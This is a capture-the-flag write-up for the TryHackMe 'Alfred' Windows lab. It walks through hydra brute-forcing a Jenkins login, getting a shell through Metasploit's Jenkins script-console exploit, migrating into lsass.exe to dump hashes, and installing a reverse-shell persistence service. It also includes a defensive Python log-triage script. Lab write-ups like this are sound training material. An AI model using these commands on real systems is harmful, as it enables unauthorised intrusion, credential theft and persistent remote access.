
Alfred - Easy THM

  • OS: windows
  • Difficulty: easy
  • Author: talace

Scanning 👀

threader3000.py

python3 threader3000.py

Port 80 is open
Port 3389 is open
Port 8080 is open

Nmap scan

nmap -p80,3389,8080 -sV -sC -T4 -Pn -oA 10.10.18.104 10.10.18.104

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
3389/tcp open  ssl/ms-wbt-server?
|   Target_Name: ALFRED
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT

Enumeration 🤖

Jenkins enumeration

Use hydra to brute-force the login form:

hydra -s 8080 -L $userfile -P $passfile $target_ip http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password' -f -o rockyou.txt

FOUND: admin:admin

Exploit ⚒️

Exploit with metasploit

use exploit/multi/http/jenkins_script_console

set LHOST 10.8.x.x
set TARGETURI /
set RPORT 8080
set RHOSTS 10.10.x.x
set username admin
set password admin
run

meterpreter >
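From the defender's side, both the hydra burst against the login form and the script-console exploit above leave traces in the Jenkins access log. The following is an added example, not code from the original post: it assumes the Jetty/Jenkins access log is written in NCSA common log format and uses the login endpoint hydra targeted (`/j_acegi_security_check`) plus Jenkins' script console paths (`/script`, `/scriptText`); the log lines and client addresses are constructed for the demonstration.

```python
"""Triage a Jenkins (Jetty) access log for login brute-force bursts and
script-console use. Added example; log lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/j_acegi_security_check"
SCRIPT_CONSOLE_PATHS = {"/script", "/scriptText"}

# NCSA common log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def _line(ip, second, method, path, status):
    """Build one constructed NCSA-format line (timestamps are made up)."""
    ts = datetime(2019, 10, 25, 18, 20, second).strftime("%d/%b/%Y:%H:%M:%S -0400")
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 0'


# Constructed sample: 12 login POSTs within 12 seconds from one client (a
# hydra-style burst), then that client hitting the script console, plus a
# second client logging in normally. Note Jenkins answers a form login with a
# 302 whether it succeeded or failed, so the status code alone cannot tell a
# good password from a bad one; the attempt rate is the signal.
SAMPLE_LOG = (
    [_line("10.8.0.5", i, "POST", LOGIN_PATH, 302) for i in range(12)]
    + [
        _line("10.8.0.5", 50, "GET", "/script", 200),
        _line("10.8.0.5", 51, "POST", "/scriptText", 200),
        _line("10.8.0.9", 30, "GET", "/login", 200),
        _line("10.8.0.9", 31, "POST", LOGIN_PATH, 302),
        _line("10.8.0.9", 40, "GET", "/", 200),
    ]
)


def parse(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Map source IP -> peak number of login POSTs seen inside any `window`,
    for sources whose peak reaches `threshold`."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            attempts[rec["ip"]].append(rec["ts"])
    alerts = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        start = peak = 0
        for end, ts in enumerate(stamps):  # sliding window over sorted times
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


def detect_script_console(lines):
    """List (ip, path) for every request to the Groovy script console; on a
    production controller this should be rare and tied to known admins."""
    hits = []
    for line in lines:
        rec = parse(line)
        if rec and rec["path"].split("?", 1)[0] in SCRIPT_CONSOLE_PATHS:
            hits.append((rec["ip"], rec["path"]))
    return hits


if __name__ == "__main__":
    print("brute-force sources:", detect_bruteforce(SAMPLE_LOG))
    print("script console hits:", detect_script_console(SAMPLE_LOG))
```

Tune `threshold` and `window` to the controller's normal login rate; a source that trips the brute-force check and then reaches `/script` or `/scriptText` in the same session is the exact sequence this writeup walks through.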

Now that we have a session open, let’s elevate our privileges!

Privilege escalation 👺

Migrate to another process for a more stable Meterpreter session, because my current process was x86 and I need an x64 one.

I’m using the lsass.exe process, so I will be able to dump hashes and perform more post-exploitation actions.

ps 

676   580   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe

Migrate to it

meterpreter > migrate 676

Now that we have a stable Meterpreter session...

Let’s retrieve user.txt 🤠

meterpreter > search -f user.txt

Path                             Size (bytes)  Modified (UTC)
----                             ------------  --------------
c:\Users\bruce\Desktop\user.txt  32            2019-10-25 18:22:36 -0400

Now root.txt! 😼

meterpreter > search -f root.txt

Path                                 Size (bytes)  Modified (UTC)
----                                 ------------  --------------
c:\Windows\System32\config\root.txt  70            2019-10-26 07:36:00 -0400

Post-exploitation 🐼

Use the local persistence module from Metasploit.

It creates a new Windows service that sends back a reverse shell:

use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set lport <lport>
set lhost <lhost>
set session <id>

Resources 📒

Article: metasploit-module-for-persistence

This post is licensed under CC BY 4.0 by the author.